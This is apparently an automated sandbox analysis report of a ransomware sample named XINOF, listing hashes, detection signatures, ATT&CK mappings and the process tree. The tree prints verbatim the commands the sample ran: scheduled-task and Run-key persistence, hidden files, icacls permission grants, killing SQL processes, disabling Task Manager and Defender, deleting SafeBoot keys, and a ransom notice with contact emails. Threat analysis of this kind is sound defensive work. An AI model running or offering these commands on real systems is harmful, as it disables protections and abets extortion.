Analysis
-
max time kernel
151s -
max time network
84s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
17-11-2020 18:09
General
-
Target
e854205221b00c30bdffb4b11752d159ae8e00cdfedc102526d2e3ce6340de77.exe
-
Size
982KB
-
MD5
3bbc12e740224a4eb4e94a4f8702793b
-
SHA1
12ff5cc349c5e6e5501416f40049bdc4d776adcb
-
SHA256
e854205221b00c30bdffb4b11752d159ae8e00cdfedc102526d2e3ce6340de77
-
SHA512
2bc507a6636091c9e4eb0d56f2a81de3ba1037c7679cd31b6e1f767368cd9ed11e5f2165cbbc1fff4cc4fae89a733c7651c50228601132fe0448c12490563c42
Score
8/10
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Modifies file permissions 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Drops desktop.ini file(s) 2 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in Program Files directory 4498 IoCs
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 72 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 228 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e854205221b00c30bdffb4b11752d159ae8e00cdfedc102526d2e3ce6340de77.exe"C:\Users\Admin\AppData\Local\Temp\e854205221b00c30bdffb4b11752d159ae8e00cdfedc102526d2e3ce6340de77.exe"1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4372⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4373⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "C:\Users\Admin\AppData\Local\Temp\e854205221b00c30bdffb4b11752d159ae8e00cdfedc102526d2e3ce6340de77.exe" /RU SYSTEM /RL HIGHEST /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix11 /TR "C:\Users\Admin\AppData\Local\Temp\e854205221b00c30bdffb4b11752d159ae8e00cdfedc102526d2e3ce6340de77.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "C:\Users\Admin\AppData\Local\Temp\e854205221b00c30bdffb4b11752d159ae8e00cdfedc102526d2e3ce6340de77.exe" /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix10 /TR "C:\Users\Admin\AppData\Local\Temp\e854205221b00c30bdffb4b11752d159ae8e00cdfedc102526d2e3ce6340de77.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy Cpriv.key C:\ProgramData\Cpriv.key2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy Cpub.key C:\ProgramData\Cpub.key2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails satanishere@tutanota.com satanishere@cock.li " /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails satanishere@tutanota.com satanishere@cock.li " /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact me by satanishere@tutanota.com satanishere@cock.li DO NOT reply to other emails. ONLY this two emails can help you." /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact me by satanishere@tutanota.com satanishere@cock.li DO NOT reply to other emails. ONLY this two emails can help you." /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Scheduled Task
1Hidden Files and Directories
1Defense Evasion
File Permissions Modification
1Modify Registry
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Cpriv.keyMD5
8a50f46470d5d66adfbaad25273cca78
SHA1739d44d4d7bcf05e0a5ded7ffd956b767645ae1f
SHA256f35d5dbabd12c4e6b9f0922f7e5a1485f1a0c4edcd944a1e6a9091fb2ab15e3e
SHA512efbdd690db2663eed98886a88ad2d7b1961d0fbe2cd9de0be8259366141b06c7c2a2f67dc903de167ac769aba727ebd3876bceb7a4aaf8fcbf152d1bf9af0ca9
-
C:\ProgramData\Cpriv.keyMD5
8a50f46470d5d66adfbaad25273cca78
SHA1739d44d4d7bcf05e0a5ded7ffd956b767645ae1f
SHA256f35d5dbabd12c4e6b9f0922f7e5a1485f1a0c4edcd944a1e6a9091fb2ab15e3e
SHA512efbdd690db2663eed98886a88ad2d7b1961d0fbe2cd9de0be8259366141b06c7c2a2f67dc903de167ac769aba727ebd3876bceb7a4aaf8fcbf152d1bf9af0ca9
-
C:\ProgramData\Cpub.keyMD5
09f163c9b43d4283829351e125e72b35
SHA1296fb3e860ed3e89705618bcc6b4a2c47a9ac032
SHA256e6c3cdf14e4cdc825c915b72f9c7a27c0c7d3ac6bca2807ead403bdda41d348d
SHA512a0cbfbd48150b26d647957a942f1036017502552c5411d5dcd417979f0490c93a2ff95c9917068dd77874c4f64e8dc771185333ba26c7920aad54c93fbc1ec24
-
C:\ProgramData\Cpub.keyMD5
09f163c9b43d4283829351e125e72b35
SHA1296fb3e860ed3e89705618bcc6b4a2c47a9ac032
SHA256e6c3cdf14e4cdc825c915b72f9c7a27c0c7d3ac6bca2807ead403bdda41d348d
SHA512a0cbfbd48150b26d647957a942f1036017502552c5411d5dcd417979f0490c93a2ff95c9917068dd77874c4f64e8dc771185333ba26c7920aad54c93fbc1ec24
-
C:\ProgramData\SystemIDMD5
319af37684c6bfcb63b230ff66d1f4d2
SHA1ff914474ab073ac3a7144cf7e72bb3a3dece28b9
SHA256a7b245b7a6cdeba1b622242d8a9277ca2e6bfab7d5be32ad7aac6751f7b44458
SHA5125e03548d2c7be14ddeab0262e8425ad4c3b1dd9e4227b5daa984af9e11c41f073bd16db8d1a92feb29c17ecfb81f4521184e240b83abcad842d7122e3f130bb5
-
C:\Users\Admin\AppData\Local\Temp\Cpriv.keyMD5
8a50f46470d5d66adfbaad25273cca78
SHA1739d44d4d7bcf05e0a5ded7ffd956b767645ae1f
SHA256f35d5dbabd12c4e6b9f0922f7e5a1485f1a0c4edcd944a1e6a9091fb2ab15e3e
SHA512efbdd690db2663eed98886a88ad2d7b1961d0fbe2cd9de0be8259366141b06c7c2a2f67dc903de167ac769aba727ebd3876bceb7a4aaf8fcbf152d1bf9af0ca9
-
C:\Users\Admin\AppData\Local\Temp\Cpub.keyMD5
09f163c9b43d4283829351e125e72b35
SHA1296fb3e860ed3e89705618bcc6b4a2c47a9ac032
SHA256e6c3cdf14e4cdc825c915b72f9c7a27c0c7d3ac6bca2807ead403bdda41d348d
SHA512a0cbfbd48150b26d647957a942f1036017502552c5411d5dcd417979f0490c93a2ff95c9917068dd77874c4f64e8dc771185333ba26c7920aad54c93fbc1ec24
-
C:\Users\Admin\AppData\Local\Temp\SystemIDMD5
319af37684c6bfcb63b230ff66d1f4d2
SHA1ff914474ab073ac3a7144cf7e72bb3a3dece28b9
SHA256a7b245b7a6cdeba1b622242d8a9277ca2e6bfab7d5be32ad7aac6751f7b44458
SHA5125e03548d2c7be14ddeab0262e8425ad4c3b1dd9e4227b5daa984af9e11c41f073bd16db8d1a92feb29c17ecfb81f4521184e240b83abcad842d7122e3f130bb5
-
memory/316-171-0x0000000000000000-mapping.dmp
-
memory/452-193-0x0000000000000000-mapping.dmp
-
memory/528-8-0x0000000000000000-mapping.dmp
-
memory/604-200-0x0000000000000000-mapping.dmp
-
memory/668-7-0x0000000000000000-mapping.dmp
-
memory/784-175-0x0000000000000000-mapping.dmp
-
memory/784-207-0x0000000000000000-mapping.dmp
-
memory/792-14-0x0000000000000000-mapping.dmp
-
memory/816-195-0x0000000000000000-mapping.dmp
-
memory/884-9-0x0000000000000000-mapping.dmp
-
memory/896-198-0x0000000000000000-mapping.dmp
-
memory/912-10-0x0000000000000000-mapping.dmp
-
memory/940-203-0x0000000000000000-mapping.dmp
-
memory/952-204-0x0000000000000000-mapping.dmp
-
memory/1012-210-0x0000000000000000-mapping.dmp
-
memory/1016-187-0x0000000000000000-mapping.dmp
-
memory/1036-205-0x0000000000000000-mapping.dmp
-
memory/1144-178-0x0000000000000000-mapping.dmp
-
memory/1156-206-0x0000000000000000-mapping.dmp
-
memory/1160-1-0x0000000000000000-mapping.dmp
-
memory/1176-15-0x0000000000000000-mapping.dmp
-
memory/1204-208-0x0000000000000000-mapping.dmp
-
memory/1256-183-0x0000000000000000-mapping.dmp
-
memory/1292-169-0x0000000000000000-mapping.dmp
-
memory/1292-170-0x0000000000000000-mapping.dmp
-
memory/1320-199-0x0000000000B00000-0x0000000000B11000-memory.dmpFilesize
68KB
-
memory/1320-24-0x0000000000B00000-0x0000000000B11000-memory.dmpFilesize
68KB
-
memory/1320-22-0x0000000000B00000-0x0000000000B11000-memory.dmpFilesize
68KB
-
memory/1320-23-0x0000000000F10000-0x0000000000F21000-memory.dmpFilesize
68KB
-
memory/1328-172-0x0000000000000000-mapping.dmp
-
memory/1492-185-0x0000000000000000-mapping.dmp
-
memory/1540-13-0x0000000000000000-mapping.dmp
-
memory/1556-182-0x0000000000000000-mapping.dmp
-
memory/1588-188-0x0000000000000000-mapping.dmp
-
memory/1660-209-0x0000000000000000-mapping.dmp
-
memory/1668-184-0x0000000000000000-mapping.dmp
-
memory/1700-197-0x0000000000000000-mapping.dmp
-
memory/1700-196-0x0000000000000000-mapping.dmp
-
memory/1708-167-0x0000000000000000-mapping.dmp
-
memory/1708-18-0x0000000000000000-mapping.dmp
-
memory/1708-202-0x0000000000000000-mapping.dmp
-
memory/1720-19-0x0000000000000000-mapping.dmp
-
memory/1724-166-0x0000000000000000-mapping.dmp
-
memory/1728-12-0x0000000000000000-mapping.dmp
-
memory/1740-11-0x0000000000000000-mapping.dmp
-
memory/1740-194-0x0000000000000000-mapping.dmp
-
memory/1776-17-0x0000000000000000-mapping.dmp
-
memory/1784-20-0x0000000000000000-mapping.dmp
-
memory/1792-201-0x0000000000000000-mapping.dmp
-
memory/1792-168-0x0000000000000000-mapping.dmp
-
memory/1796-21-0x0000000000000000-mapping.dmp
-
memory/1872-16-0x0000000000000000-mapping.dmp
-
memory/1888-186-0x0000000000000000-mapping.dmp
-
memory/1944-190-0x0000000000000000-mapping.dmp
-
memory/1968-6-0x0000000000000000-mapping.dmp
-
memory/1972-4-0x0000000000000000-mapping.dmp
-
memory/1976-192-0x0000000000000000-mapping.dmp
-
memory/1980-191-0x0000000000000000-mapping.dmp
-
memory/1984-5-0x0000000000000000-mapping.dmp
-
memory/1992-3-0x0000000000000000-mapping.dmp
-
memory/2004-0-0x0000000000000000-mapping.dmp
-
memory/2036-2-0x0000000000000000-mapping.dmp
-
memory/2040-189-0x0000000000000000-mapping.dmp